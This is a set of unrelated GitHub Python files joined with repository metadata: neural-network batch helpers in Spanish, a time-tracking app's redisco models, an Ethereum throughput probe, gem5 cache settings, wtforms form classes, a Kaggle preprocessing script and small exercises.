print(' 14 - Anclas (rectangulos predeterminados) ---------------> ', anchors)
print('')
print(' 15 - H, W, S, C, B, sqrt --------------------------------> ', H, W, C, B)
print('')
de_acuerdo = input('Estos son los parametros de la red. Está de acuerdo con ellos (s/n): ')
print('')
print('Perfecto, alla vamooooos.')
else:
print('')
print('Perfecto, continuemos.')
return ent_numb_max,paso_maximo,precision_min,dim_fil,dim_col,batch_size,batch_size_test,cada_pasito,quiero_ver,salvando,preprocesamiento,learning_ratio,threshold,labels,anchors,H, W, C, B
def desordenar(nombrecitos_bonitos):
    """Shuffle *nombrecitos_bonitos* in place by random pairwise swaps.

    For a list of length n, n random indices are drawn and consecutive
    pairs of those indices are swapped, performing roughly n/2 swaps.
    The list is modified in place and also returned.

    Fix: the previous revision crashed on an empty list, because
    ``np.random.randint(0, 0, ...)`` raises ValueError before the length
    guard was ever reached.
    """
    longi = len(nombrecitos_bonitos)
    if longi < 2:
        # Nothing to shuffle; also avoids randint(0, 0), which is invalid.
        return nombrecitos_bonitos
    lista_aleatoria = np.random.randint(0, longi, (longi))
    for lana in range(int(longi / 2)):
        num1 = lista_aleatoria[2 * lana]
        num2 = lista_aleatoria[2 * lana + 1]
        nombrecitos_bonitos[num1], nombrecitos_bonitos[num2] = (
            nombrecitos_bonitos[num2], nombrecitos_bonitos[num1])
    return nombrecitos_bonitos
def desordenar_todo(nombrecitos_bonitos):
    """Shuffle *nombrecitos_bonitos* in place by random pairwise swaps.

    Identical algorithm to ``desordenar`` (kept as a separate function to
    preserve the existing public API): draw n random indices and swap
    consecutive pairs of them, i.e. roughly n/2 swaps for n elements.
    Returns the same (mutated) list.

    Fix: the previous revision crashed on an empty list, because
    ``np.random.randint(0, 0, ...)`` raises ValueError before the length
    guard was ever reached.
    """
    longi = len(nombrecitos_bonitos)
    if longi < 2:
        # Nothing to shuffle; also avoids randint(0, 0), which is invalid.
        return nombrecitos_bonitos
    lista_aleatoria = np.random.randint(0, longi, (longi))
    for lana in range(int(longi / 2)):
        num1 = lista_aleatoria[2 * lana]
        num2 = lista_aleatoria[2 * lana + 1]
        nombrecitos_bonitos[num1], nombrecitos_bonitos[num2] = (
            nombrecitos_bonitos[num2], nombrecitos_bonitos[num1])
    return nombrecitos_bonitos
""" ===================================
Este programa carga el lote. Nosotros
le damos los nombres de los archivos
.txt y el nos devuelve la imagen una
vez realizadas algunas transformaciones
aparte de los array probabilidad,
coordenada, area...
=================================== """
| [
"noreply@github.com"
] | sergiocoteronPI.noreply@github.com |
a504243b512c9026ea67e088ce224c687a2ef2d0 | 105bd35304dd1d831bcb89f42120af1ec87065ae | /tempCodeRunnerFile.py | cef0a82d926221f858eaab066203cf5371154ac7 | [] | no_license | ayush-105192219/python-test-code | 3dd861e197cd326fc0e7c642a5fd3a00fe12408e | 053de4841e338e631e7d386275c4e40ee9f8e21e | refs/heads/master | 2023-05-31T10:57:35.015286 | 2021-07-01T07:48:58 | 2021-07-01T07:48:58 | 381,952,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py |
print (( 20 + 1.1)) #output:21.1 | [
"mynameayush100@gmail.com"
] | mynameayush100@gmail.com |
34c324f9bfe464ec5dec8508c846a30409c79e34 | 46c521a85f567c609f8a073cb9569ea59e2a104f | /kunalProgram23.py | bab9fcf53fa8ff6e595f560e1fd900d0d4fa40d5 | [] | no_license | Kunal352000/python_adv | c046b6b785b52eaaf8d089988d4dadf0a25fa8cb | d9736b6377ae2d486854f93906a6bf5bc4e45a98 | refs/heads/main | 2023-07-15T23:48:27.131948 | 2021-08-21T13:16:42 | 2021-08-21T13:16:42 | 398,557,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | n=int(input("Enter number of rows: "))
for i in range(n):
print(" "*(n-1-i)+(str(i+1)+' ')*(i+1))
for i in range(n-1):
print(" "*(i+1)+(str(n-1-i)+' ')*(n-1-i))
| [
"noreply@github.com"
] | Kunal352000.noreply@github.com |
108ee0f25ca41a2dd1d82011514133e044d940a3 | 583dcbcbad658fa7b9f297202523e1a165da342f | /models.py | 52646339ac58a102d71b1cef84eeecd146ed21d2 | [] | no_license | csdurfee/more_time | 01e482ff29a871f63b6f808b4b18b4fd9d6ebc61 | 982f1615570de91547bff6108e63aca50a117d29 | refs/heads/master | 2020-04-05T23:08:38.842854 | 2012-01-01T21:38:23 | 2012-01-01T21:38:23 | 2,814,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,000 | py | from redisco import models
#from werkzeug import generate_password_hash, check_password_hash
import werkzeug
DEFAULT_PROJECT_NAME = "Junk Drawer"
DEFAULT_TASK_NAME = "My Task"
class StaticPage(models.Model):
    """A simple CMS-style page stored in Redis via redisco."""
    title = models.Attribute(required=True)
    # Body text; not indexed because it is only ever displayed, not searched.
    text = models.Attribute(indexed=False)
class UnitOfWork(models.Model):
    """One timed work interval belonging to a Task.

    start_time / end_time are stored as integers (epoch timestamps,
    presumably seconds -- TODO confirm against whoever sets them).
    """
    note = models.Attribute()
    start_time = models.IntegerField()
    end_time = models.IntegerField()
    task = models.ReferenceField("Task")
    def elapsed(self):
        """Return the interval length, or 0 while the unit is still open."""
        if not self.end_time:
            return 0
        return self.end_time - self.start_time
    def __unicode__(self):
        return "%s -- %s -- %s -- %s" % (self.task, self.note,
                self.start_time, self.end_time)
class Task(models.Model):
    """A named task made up of UnitOfWork intervals, belonging to a Project."""
    name = models.Attribute(default=DEFAULT_TASK_NAME)
    units_of_work = models.ListField(UnitOfWork)
    project = models.ReferenceField('Project')
    active = models.BooleanField(default=False)
    # NOTE(review): "elasped" is a typo for "elapsed", kept as-is because
    # renaming would break existing callers of the public API.
    def elasped(self):
        """Return the total elapsed time across all units of work."""
        _all_times = [x.elapsed() for x in self.units_of_work]
        return sum(_all_times)
    def __unicode__(self):
        return unicode(self.name)
class Project(models.Model):
    """A named collection of Tasks; at most one is expected to be active."""
    name = models.Attribute(default=DEFAULT_PROJECT_NAME)
    tasks = models.ListField(Task)
    active = models.BooleanField(default=False)
    def num_tasks(self):
        """Return the number of tasks in this project."""
        return len(self.tasks)
    def __unicode__(self):
        return unicode(self.name)
#@YAGNI
"""
class UserSpace(models.Model):
users = models.ListField(User)
name = models.Attribute(required=True)
"""
class User(models.Model):
    """An account holding projects; passwords are hashed via werkzeug."""
    user_name = models.Attribute(required=True)
    real_name = models.Attribute()
    # Salted password hash as produced by werkzeug.generate_password_hash.
    pwdhash = models.Attribute(required=True)
    active = models.BooleanField(default=True)
    email = models.Attribute()
    paid = models.BooleanField(default=False)
    #profile = models.ReferenceField('UserProfile')
    projects = models.ListField(Project)
    created = models.DateTimeField(auto_now_add=True)
    def check_password(self, password):
        """Return True if *password* matches the stored hash."""
        return werkzeug.check_password_hash(self.pwdhash, password)
    @staticmethod
    def create_user(user_name, password, email):
        """Factory that hashes *password* before storing it.

        redisco doesn't allow you to override the constructor, hence
        the rather ugly staticmethod.  Note: the caller must still
        .save() the returned instance."""
        u = User(user_name=user_name, email=email)
        u.pwdhash = werkzeug.generate_password_hash(password)
        return u
# TODO: put this in a separate managers.py file.
class UserManager(object):
    """Helpers for resolving the current user and their active project/task.

    (Original author's words: "junk-drawer class. ugh.")
    """
    @staticmethod
    def get_for_timer(session, request):
        """
        Return the user for this session (defaulting to 'casey' when the
        session has no user_name), plus their active project and task,
        creating defaults as needed.
        Returns (user, active project, active task).
        NOTE(review): the *request* argument is currently unused.
        """
        """if 'username' in session:
            user = User.objects.get_or_create(user_name = escape(session['username']))
        else:
            pass
        """
        user_name = session.get('user_name', 'casey')
        user = User.objects.get_or_create(user_name = user_name)
        # TODO: get passed in project, not default to active
        active_project = UserManager._getOrCreateActiveProject(user)
        active_task = UserManager._getOrCreateActiveTask(active_project)
        return (user, active_project, active_task,)
    @staticmethod
    def _getOrCreateActiveProject(user):
        """returns a default, "unclassified" project called Junk Drawer if there
        are no projects, or one isn't active.
        TODO: add last accessed timestamp attr here.
        """
        active_project = None
        first_project = None
        # Single pass: remember the first project, stop at the first active one.
        for p in user.projects:
            if not first_project:
                first_project = p
            if p.active:
                active_project = p
                break
        if not active_project:
            if first_project:
                # No active project: promote the first existing one.
                active_project = first_project
                active_project.active = True
                active_project.save()
            else:
                # No projects at all: create the default and attach it.
                active_project = Project(active=True)
                active_project.save()
                user.projects.append(active_project)
                user.save()
        return active_project
    @staticmethod
    def _getOrCreateActiveTask(project):
        # Same promote-or-create logic as _getOrCreateActiveProject, but for
        # tasks within the given project.
        active_task = None
        first_task = None
        for t in project.tasks:
            if not first_task:
                first_task = t
            if t.active:
                active_task = t
                break
        if not active_task:
            if first_task:
                active_task = first_task
                active_task.active = True
                active_task.save()
            else:
                active_task = Task(active=True)
                active_task.save()
                project.tasks.append(active_task)
                project.save()
        return active_task
| [
"casey.durfee@saltbox.com"
] | casey.durfee@saltbox.com |
36285a335509b2e26d604c76af957f03339a6729 | e51642d571d1c30950782a47fdd8654e07dd9fb9 | /Ethereum/smallbank-throughput.py | 60993a33dba809743393aa71e0ef9c59167452c4 | [] | no_license | TimRi91/Distributed-Ledger-Testbench | 18e950d01737deb671dbb3484c4243f209ede2ac | f940ede242804fcbee47bae2aa6a83bf0091b54e | refs/heads/master | 2020-03-23T04:45:33.991871 | 2018-09-12T09:23:48 | 2018-09-12T09:23:48 | 141,103,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | import os
import time
from web3 import Web3
#----------------Set Variables----------------
#Testsetrate (#requests/sec)
n = 6
#Node
# NOTE(review): `node` is set but never used below.
node = 'localnode'
#---------------------------------------------
#create .txt-file
# Results file is named after the test-set rate and the start timestamp.
filename = 'Smallbank_Throughput_Testset'+str(n)+'_'+str(time.strftime("%d-%m-%Y_%H-%M-%S"))+'.txt'
pathname = os.path.join('results', filename)
# Connect to the local Ethereum JSON-RPC endpoint.
web3 = Web3(Web3.HTTPProvider("http://127.0.0.1:30311", request_kwargs={'timeout': 60}))
tBeginn=time.time()
# Sample throughput once per second for 300 seconds: count how many
# transactions landed in the blocks mined during each 1-second window.
while True:
    if time.time()-tBeginn < 300:
        iRate = 0
        iStart=web3.eth.blockNumber
        # Sleep until the next whole-second boundary relative to tBeginn.
        time.sleep(1.0 - ((time.time() - tBeginn) % 1.0))
        iResult = web3.eth.blockNumber - iStart
        # Sum the transaction counts of every block mined in this window.
        for x in range(iResult):
            iRate = iRate + web3.eth.getBlockTransactionCount(iStart+x+1)
        print ('#tx/sec: ' + str(iRate))
        with open(pathname, "a") as file:
            file.write(str(iRate) + ' #tx/s \n')
        # NOTE(review): redundant -- the `with` block already closed the file
        # (also, `file` shadows the Python 2 builtin of the same name).
        file.close()
    else:
        break
print('Measurement finished')
| [
"noreply@github.com"
] | TimRi91.noreply@github.com |
35939d663896d25c64d3e144f07104d07d5f9c82 | 136475c7b1cf05241c45aa1228f7b9c50f16ab89 | /venv/Scripts/pip3.7-script.py | 61425625725ce2371b2c9463f18baff4c5c1d91f | [] | no_license | rachanakafle/Cows_and_Bulls_Game | 09f540027a795a06d7cd96c86235e8cfc461fb9a | bfd9495b47960bc9477cb0bdc2fa8d576c5d9a73 | refs/heads/master | 2020-04-13T05:18:14.116069 | 2018-12-24T12:20:12 | 2018-12-24T12:20:12 | 162,987,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | #!"C:\Users\Rachana Kafle\Desktop\Cows-and-Bulls\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.7'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.7')()
)
| [
"rachanakafle32@gmail.com"
] | rachanakafle32@gmail.com |
e9a7fec21d2cd66e4b6496833ff0f6019d382202 | b33c9f49ab3b0e9ab853c5ae5bad01a9a1349504 | /Processing/car.py | 91531a187ba737524759f4003b7e4f624b8eeaf5 | [] | no_license | raphaelbp12/Projeto-Final | cf5693b1824a2e660fc12c0630f8a40953c956d8 | ca722a5c42bd36d7fc77702218227e3204a69cb4 | refs/heads/master | 2021-01-23T07:34:27.339984 | 2017-11-02T00:03:44 | 2017-11-02T00:03:44 | 86,429,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,743 | py | from sensors import Sensors
from controlDistWall import ControlDistWall
class Car(object):
    """A differential-drive style car for a Processing(py) sketch.

    Uses Processing Python-mode builtins (radians, cos, sin, stroke, line,
    fill, ellipse), so it is only runnable inside a Processing sketch.
    Pose is (x, y, theta) with theta stored in radians.
    """
    def __init__(self,x = 0,y = 0, theta = 0):
        # *theta* is given in degrees and stored in radians.
        self.x = x
        self.y = y
        self.theta = radians(theta)
        self.velLin = 0
        self.velAng = 0
        # Last measured distances to the walls (updated by sense()).
        self.distFront = 0
        self.distRight = 0
        self.distLeft = 0
        self.sensors = Sensors()
        # False until initControl() installs a ControlDistWall controller.
        self.control = False
    def initControl(self, KpAng, KpLin, circuitWeight):
        """Install a wall-distance controller with the given gains."""
        self.control = ControlDistWall(KpAng, KpLin, circuitWeight)
    def sense(self, wallsPoints, maxDist):
        """Query the sensors; cache front/right/left distances when all 3 hit.

        Each returned point appears to carry the measured distance at index
        3 -- TODO confirm against Sensors.calcDistanceToWall.
        """
        retPoints = []
        for p in self.sensors.calcDistanceToWall(self.theta, wallsPoints, maxDist, self):
            retPoints.append(p)
        if len(retPoints) == 3:
            self.distFront = retPoints[0][3]
            self.distRight = retPoints[1][3]
            self.distLeft = retPoints[2][3]
        return retPoints
    def move(self, velLin, velAng):
        """Integrate one step: turn by velAng, then advance velLin along the
        *new* heading."""
        self.velLin = velLin
        self.velAng = velAng
        self.theta = self.theta + velAng
        self.x = self.x + velLin*cos(self.theta)
        self.y = self.y + velLin*sin(self.theta)
        #print "x = "+str(self.x)+" y = "+str(self.y)+" theta = "+ str(self.theta) +" velLin = "+str(velLin)+" velAng = "+str(velAng)
    def controlCar(self):
        """One closed-loop step using the cached sensor distances.

        Requires initControl() to have been called first (self.control is
        False otherwise and this would fail).
        """
        self.move(self.control.controlLinVel(self.distFront), self.control.controlAngVel(self.distRight, self.distLeft))
    def display(self):
        """Draw the car: a heading line (length ∝ speed, min 30) + a dot."""
        stroke(255,0,0)
        velLin = self.velLin
        if velLin < 30:
            velLin = 30
        line(self.x, self.y, self.x+velLin*cos(self.theta), self.y+velLin*sin(self.theta))
        fill(255)
        ellipse(self.x,self.y,10,10)
"raphaelbp12@gmail.com"
] | raphaelbp12@gmail.com |
492972e2ecb7185035cc667f45cc39a9357f364a | 415f5a763c7dd7a1881b32ab3d459e7779342d67 | /python/create_dataset_V2.py | 4b8a276ab3681bb1a8e691c09abd672e28e3c70d | [] | no_license | anuragreddygv323/kaggle-redhat | e6d35953dffbeecdd3de43c3fbc0a7b48df76dec | de85518c68aa8ff07d4cf6cab7c6a30ddb9ab5a6 | refs/heads/master | 2021-01-01T17:55:42.777586 | 2016-08-31T07:18:03 | 2016-08-31T07:18:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,214 | py | from sklearn.preprocessing import LabelEncoder
import pandas as pd
import numpy as np
import random
random.seed(2016)
def preprocess_acts(data, trainset = True):
    # Feature-engineer the activities dataframe IN PLACE (and return it):
    # expand the date into year/month/week/day, numericise people_id, and
    # frequency-encode every categorical column.  Python 2 / pandas code.
    data = data.drop(['activity_id'], axis=1)
    columns = list(data.columns)
    columns.remove('date')
    if trainset:
        columns.remove('outcome')
    print "Processing dates"
    data['tyear'] = data['date'].dt.year
    data['tmonth'] = data['date'].dt.month
    data['tyearweek'] = data['date'].dt.week
    data['tday'] = data['date'].dt.day
    ## Split off from people_id
    # people_id looks like "ppl_12345"; keep only the numeric part.
    data['people_id'] = data['people_id'].apply(lambda x: x.split('_')[1])
    data['people_id'] = pd.to_numeric(data['people_id']).astype(int)
    # Frequency-encode the categoricals (columns[0] is people_id, skipped):
    # each value is replaced by its relative frequency in the column.
    for col in columns[1:]:
        print "Processing", col
        data[col] = data[col].fillna('type 0')
        le = LabelEncoder()
        data[col] = data.groupby(le.fit_transform(data[col]))[col].transform('count') / data.shape[0]
    # Sum of the (already frequency-encoded) char columns -- presumably
    # char_1..char_9 by position; TODO confirm the column order assumption.
    data['t_sum_true'] = data[columns[2:11]].sum(axis=1)
    return data
def preprocess_people(data):
    # Feature-engineer the people dataframe IN PLACE (and return it).
    ## Split off from people_id
    # people_id looks like "ppl_12345"; keep only the numeric part.
    data['people_id'] = data['people_id'].apply(lambda x: x.split('_')[1])
    data['people_id'] = pd.to_numeric(data['people_id']).astype(int)
    # Values in the people df is Booleans and Strings
    # NOTE(review): both slices below are positional -- they assume the CSV
    # column order (strings in cols 1..11, booleans from 12 up to char_38).
    columns = list(data.columns)
    bools = columns[12:-1]
    strings = columns[1:12]
    strings.remove('date')
    for col in bools:
        print "Processing", col
        data[col] = pd.to_numeric(data[col]).astype(int)
    # Get the sum of positive results - not including 38
    data['p_sum_true'] = data[bools[:-1]].sum(axis=1)
    # Rather than turning them into ints which is fine for trees, lets develop response rates
    # So they can be used in other models.
    # (frequency encoding: each value becomes its relative frequency)
    for col in strings:
        data[col] = data[col].fillna('type 0')
        le = LabelEncoder()
        data[col] = data.groupby(le.fit_transform(data[col]))[col].transform('count') / data.shape[0]
    print "Processing dates"
    data['pyear'] = data['date'].dt.year
    data['pmonth'] = data['date'].dt.month
    data['pyearweek'] = data['date'].dt.week
    data['pday'] = data['date'].dt.day
    print "People processed"
    return data
def read_test_train():
    # Load the three Red Hat CSVs, preprocess them, and join activities with
    # their person's features.  Returns the final (train, test) dataframes.
    ####### Build and save the datsets
    print("Read people.csv...")
    people = pd.read_csv("./input/people.csv",
                       dtype={'people_id': np.str,
                              'activity_id': np.str,
                              'char_38': np.int32},
                       parse_dates=['date'])
    print("Load train.csv...")
    train = pd.read_csv("./input/act_train.csv",
                        dtype={'people_id': np.str,
                               'activity_id': np.str,
                               'outcome': np.int8},
                        parse_dates=['date'])
    # Keep the ids aside: preprocess_acts drops the activity_id column.
    id_train = train['activity_id']
    print("Load test.csv...")
    test = pd.read_csv("./input/act_test.csv",
                       dtype={'people_id': np.str,
                              'activity_id': np.str},
                       parse_dates=['date'])
    id_test = test['activity_id']
    # Preprocess each df
    peeps = preprocess_people(people)
    actions_train = preprocess_acts(train)
    actions_test = preprocess_acts(test, trainset=False)
    # Training
    print "Merge Train set"
    train = actions_train.merge(peeps, how='left', on='people_id')
    train['activity_id'] = id_train
    print "Merge Test set"
    # Testing
    test = actions_test.merge(peeps, how='left', on='people_id')
    test['activity_id'] = id_test
    # Play with dates:
    # days_diff = activity date minus person date (merge suffixes _x/_y).
    train['days_diff'] = [int(i.days) for i in (train.date_x - train.date_y)]
    test['days_diff'] = [int(i.days) for i in (test.date_x - test.date_y)]
    # finally remove date vars:
    train.drop(['date_x', 'date_y'], axis=1, inplace=True)
    test.drop(['date_x', 'date_y'], axis=1, inplace=True)
    return train, test
# Build the datasets and persist them for the downstream model scripts.
train, test= read_test_train()
print('Length of train: ', len(train))
print('Length of test: ', len(test))
train.to_csv("./input/xtrain_ds_v2.csv", index=False, header=True)
test.to_csv("./input/xtest_ds_v2.csv", index=False, header=True)
print "Done"
"michael.pearmain@gmail.com"
] | michael.pearmain@gmail.com |
a94cc410db3053720df1ce02d0a291ebb7d5ad00 | ebabbf75b7bcfbb8d22b3c3edb44b957878aaa4b | /src/fortypytons/Util.py | 586e25d575a69e7438fc58a54d5be4845eba844f | [] | no_license | tanuva/fortytons | dca736fdbe8e151a8eba2398a89ee3bc7408357e | 26ac2e99e1516ccc11492205ec370cb2af5818f3 | refs/heads/master | 2021-01-01T20:00:21.059323 | 2014-10-20T18:32:06 | 2014-10-20T18:32:06 | 2,162,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # -*- coding: utf-8 -*-
'''
Created on 26.02.2012
@author: marcel
'''
import math
from panda3d.bullet import BulletGhostNode
class Util:
@staticmethod
def getAbsolutePos(relPos, node):
""" Calculates the position of relPos (which is relative to node) relative to render (the origin). """
dummy = render.attachNewNode(BulletGhostNode())
dummy.setPos(node, relPos)
absPos = dummy.getPos()
return absPos
@staticmethod
def getDistance(first, second):
""" Calculates the distance between two Vec3 instances. """
# The sqrt of the sum ((Pi - Qi)^2)
return math.sqrt((first[0]-second[0])**2 + (first[1]-second[1])**2 + (first[2]-second[2])**2)
| [
"tanuva@nightsoul.org"
] | tanuva@nightsoul.org |
fbfa3f610397bf4050c5c75cc06b237878603097 | bb6017001fbaec2b0f858da3dc29a3963a7b37b3 | /AutoScript/caches/basic_caches_CacheSize_0.5.py | 0104b9cd7549f00225c6bbcaa56ea4069751445b | [
"MIT"
] | permissive | gabriel-lando/INF01113-gem5_Scripts | aeff71340e05e2c81ab3a2a2148a72cad3792ebb | 3a45c51aacaeafa2749043e3d54faff1c5ae5452 | refs/heads/master | 2020-06-10T22:44:37.881259 | 2019-06-27T08:21:49 | 2019-06-27T08:21:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,613 | py | # -*- coding: utf-8 -*-
######################################################################
## Classes relacionadas às caches. Podem ser modificadas para alterar
## o tamanho (size), a associatividade (assoc), a latência no caso de
## hit (hit_latency) e a latência no caso de miss (response_latency) -
## ou seja, o tempo necessário para encaminhar a requisição ao proximo
## nível na hierarquia.
######################################################################
from m5.objects import Cache
class BasicL1ICache(Cache):
    """gem5 L1 instruction cache: 32 kB, 8-way, 1-cycle latencies."""
    size = '32kB'
    assoc = 8
    tag_latency = 1
    data_latency = 1
    response_latency = 1
    mshrs = 4
    tgts_per_mshr = 16
    def __init__(self, options=None):
        super(BasicL1ICache, self).__init__()
        pass
class BasicL1DCache(Cache):
    """gem5 L1 data cache: 0.5 kB, 2-way; data latency is set per instance."""
    size = '0.5kB'
    assoc = 2
    tag_latency = 1
    data_latency = 2
    response_latency = 2
    mshrs = 4
    tgts_per_mshr = 16
    def __init__(self, latency):
        super(BasicL1DCache, self).__init__()
        # Unlike the other caches, the hit latency is parameterised here.
        self.data_latency = latency
        pass
class BasicL2Cache(Cache):
    """gem5 L2 cache: 256 kB, 8-way."""
    size = '256kB'
    assoc = 8
    tag_latency = 8
    data_latency = 12
    response_latency = 4
    mshrs = 16
    tgts_per_mshr = 16
    def __init__(self, options=None):
        super(BasicL2Cache, self).__init__()
        pass
class BasicL3Cache(Cache):
    """gem5 L3 cache: 2 MB, 16-way."""
    size = '2MB'
    assoc = 16
    tag_latency = 12
    data_latency = 36
    response_latency = 4
    mshrs = 16
    tgts_per_mshr = 16
    def __init__(self, options=None):
        super(BasicL3Cache, self).__init__()
        pass
| [
"gabriellando@hotmail.com"
] | gabriellando@hotmail.com |
462380fa38921da7fcbe4172367723d74a2715c6 | 5d64ece6522498b3919bc11c4489978290ea4a38 | /module/forms.py | 4e1b7f45c424e1ca69b3a387632ee51c765caa86 | [] | no_license | wctsai20002/seleniumonitor | 6b601efb46568c904da5e00bc391e62373468592 | 0e49b7024fd39082e1174b2fd6cf4e9a6af7d115 | refs/heads/master | 2023-06-30T02:45:36.760400 | 2021-07-21T13:27:48 | 2021-07-21T13:27:48 | 382,865,240 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,885 | py | from wtforms import Form, BooleanField, StringField, PasswordField, validators, IntegerField, FloatField, fields, TextAreaField, Field
from wtforms import widgets
from wtforms.validators import ValidationError
from wtforms.fields import html5
class StringListField(StringField):
    """A textarea-backed wtforms field whose value is a list of lines."""
    widget = widgets.TextArea()

    def _value(self):
        # Render the stored list back as one line per entry.
        return '\n'.join(self.data) if self.data else u''

    def process_formdata(self, valuelist):
        # Split the raw textarea payload into stripped, non-empty lines.
        if not valuelist:
            self.data = []
            return
        self.data = [linea.strip() for linea in valuelist[0].split('\n') if linea]
class SaltyPasswordField(StringField):
    """Password field that stores a salted PBKDF2 hash, never the plaintext.

    After form processing, `encrypted_password` holds base64(salt + key)
    and `data` is blanked (empty input leaves `data` set to False).
    NOTE(review): no verification counterpart is defined here -- whoever
    checks passwords must split the first 32 bytes (salt) back out.
    """
    widget = widgets.PasswordInput()
    encrypted_password = ''
    def build_password(self, password):
        # Derive base64(salt || PBKDF2-HMAC-SHA256(password, salt, 100k)).
        import hashlib
        import base64
        import secrets
        # Make a new salt on every new password and store it with the password
        salt = secrets.token_bytes(32)
        key = hashlib.pbkdf2_hmac('sha256', password.encode('utf-8'), salt, 100000)
        store = base64.b64encode(salt + key).decode('ascii')
        return store
    # incoming
    def process_formdata(self, valuelist):
        if valuelist:
            # Be really sure it's non-zero in length
            if len(valuelist[0].strip()) > 0:
                self.encrypted_password = self.build_password(valuelist[0])
                # Blank the visible field value so the plaintext never echoes.
                self.data = ''
            else:
                self.data = False
# Separated by key : value
class StringDictKeyValue(StringField):
    """Textarea-backed wtforms field that holds a dict, edited as `key: value` lines."""
    widget = widgets.TextArea()

    def _value(self):
        """Render the stored dict back into `key: value` lines for the textarea."""
        if self.data:
            output = u''
            for k in self.data.keys():
                output += '{}: {}\r\n'.format(k, self.data[k])
            return output
        else:
            return u''

    # incoming
    def process_formdata(self, valuelist):
        """Parse submitted textarea text into a dict, one `key: value` pair per line."""
        if valuelist:
            self.data = {}
            # Remove empty strings
            cleaned = list(filter(None, valuelist[0].split('\n')))
            for s in cleaned:
                # Split on the FIRST colon only so values may themselves
                # contain colons (e.g. "Referer: https://example.com");
                # previously such lines were silently dropped.
                parts = s.strip().split(':', 1)
                if len(parts) == 2:
                    self.data.update({parts[0].strip(): parts[1].strip()})
        else:
            self.data = {}
class ListRegex(object):
    """wtforms-style validator: every entry of a list field must be a valid regex.

    Entries wrapped in /.../ are stored without the delimiters internally,
    so the delimiters are stripped before compiling.
    """

    def __init__(self, message=None):
        self.message = message

    def __call__(self, form, field):
        import re
        for line in field.data:
            # Guard the length so empty entries no longer raise IndexError
            # on line[0]; re.compile('') is a valid (empty) pattern.
            if len(line) >= 2 and line[0] == '/' and line[-1] == '/':
                # Because internally we dont wrap in /
                line = line.strip('/')
            try:
                re.compile(line)
            except re.error:
                message = field.gettext('RegEx \'%s\' is not a valid regular expression.')
                raise ValidationError(message % (line,))
class ContainerForm(Form):
    """Per-watch edit form: URL, metadata, content filters and notification settings."""
    # NOTE: wtforms renders fields in declaration order; do not reorder.
    url = html5.URLField('URL', [validators.URL(require_tld=False)])
    title = StringField('Title')
    tags = StringField('Tags', [validators.Optional(), validators.Length(max=35)])
    interval = FloatField('Maximum time in seconds until recheck', [validators.Optional(), validators.NumberRange(min=1)])
    css_selector = StringField('CSS Filter')
    # One regex/text per line; each line validated as a regular expression.
    ignore_text = StringListField('Ignore Text', [ListRegex()])
    notification_emails = StringListField('Notification Email')
    # One "Header-Name: value" pair per line.
    headers = StringDictKeyValue('Request Headers')
    trigger_notify = BooleanField('Send test notification on save')
class SettingForm(Form):
    """Global application settings form (admin password, defaults, notifications)."""
    # NOTE: wtforms renders fields in declaration order; do not reorder.
    # Stored as a salted PBKDF2 hash, never as plaintext.
    password = SaltyPasswordField()
    interval = FloatField('Maximum time in seconds until recheck', [validators.NumberRange(min=1)])
    extract_title_as_title = BooleanField('Extract <title> from document and use as watch title')
    notification_emails = StringListField('Notification Email')
    line_notify_token = StringField('Line Notify Token')
    trigger_notify = BooleanField('Send test notification on save')
def populate_edit_form(form, web_container):
    """Copy a watch container's saved settings into the edit form's fields."""
    setting = web_container.setting
    form.url.data = setting.url
    form.title.data = setting.title
    form.interval.data = setting.interval
    form.css_selector.data = setting.css_selector
    form.notification_emails.data = setting.notification_emails
    # Tags are stored as a list but edited as a single space-separated string.
    form.tags.data = ' '.join(setting.tags)
def populate_setting_form(form, config, global_setting):
    """Fill the global settings form from the persisted global configuration.

    `config` is unused but kept for interface compatibility with callers.
    """
    # The Line Notify token is shown partially masked so it cannot be read back.
    form.line_notify_token.data = make_hidden_token(global_setting.line_notify_token)
    form.interval.data = global_setting.default_interval
    form.extract_title_as_title.data = global_setting.extract_title
    form.notification_emails.data = global_setting.mails
def make_hidden_token(token):
    """Mask the middle half of *token* with asterisks, keeping the outer quarters visible."""
    length = len(token)
    head = length // 4
    tail = (3 * length) // 4
    return token[:head] + '*' * (tail - head) + token[tail:]
| [
"wctsai20002@gmail.com"
] | wctsai20002@gmail.com |
c9b53f66d3414dd90a7fefc960bedfb59b1036e9 | 8f6e48d414a410acc1a4919be9a0366366f98944 | /backend/event/apps.py | 23ea13300b6b6a94ab67d09a7b8b4c020a8bfef7 | [] | no_license | lyf2000/events | 04bf7d6886edb77bbd7895860ca710d1a58ea524 | 001f2d3172be12268c87e5bcc1e9d4d59331f751 | refs/heads/master | 2022-11-11T10:39:51.704848 | 2020-07-04T04:08:58 | 2020-07-04T04:08:58 | 274,938,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | from django.apps import AppConfig
class BlogConfig(AppConfig):
    """Django application configuration for the `event` app.

    NOTE(review): the class is named BlogConfig but configures the `event`
    app — presumably copied from a blog app; consider renaming (callers in
    settings/INSTALLED_APPS would need updating too).
    """
    name = 'event'
| [
"lyf2000@mail.ru"
] | lyf2000@mail.ru |
